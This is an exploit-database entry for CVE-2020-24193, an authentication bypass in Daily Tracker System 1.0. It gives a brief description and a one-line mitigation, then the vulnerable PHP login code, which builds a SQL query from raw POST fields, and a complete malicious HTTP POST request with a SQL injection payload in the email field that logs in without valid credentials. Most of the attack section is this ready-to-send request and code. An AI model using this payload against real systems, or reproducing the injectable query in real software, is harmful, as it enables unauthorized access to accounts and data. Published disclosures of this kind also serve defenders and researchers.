header-logo
Suggest Exploit
vendor:
Daily Tracker System
by:
Adeeb Shah & Bobby Cooke
9.8
CVSS
CRITICAL
Authentication Bypass
287
CWE
Product Name: Daily Tracker System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: CVE-2020-24193
CPE: a:sourcecodester:daily_tracker_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
2020

Daily Tracker System 1.0 – Authentication Bypass

A vulnerability in Daily Tracker System 1.0 allows an attacker to bypass authentication by sending a malicious POST request to the application. This vulnerability is due to the application not properly validating user input. An attacker can exploit this vulnerability to gain unauthorized access to the application.

Mitigation:

Ensure that user input is properly validated and sanitized before being used in the application.
Source

Exploit-DB raw data:

# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24193
# Date: September 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

# Vulnerable Source Code

if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where  Email='$email' && Password='$password    ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
 $_SESSION['detsuid']=$ret['ID'];
 header('location:dashboard.php');
}
 else{
 $msg="Invalid Details.";
 }
}
?>


# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1

email='+or+1%3d1+--+hyd3sec&password=badPass&login=login

Navigation

Suggest Exploit

Services By CQR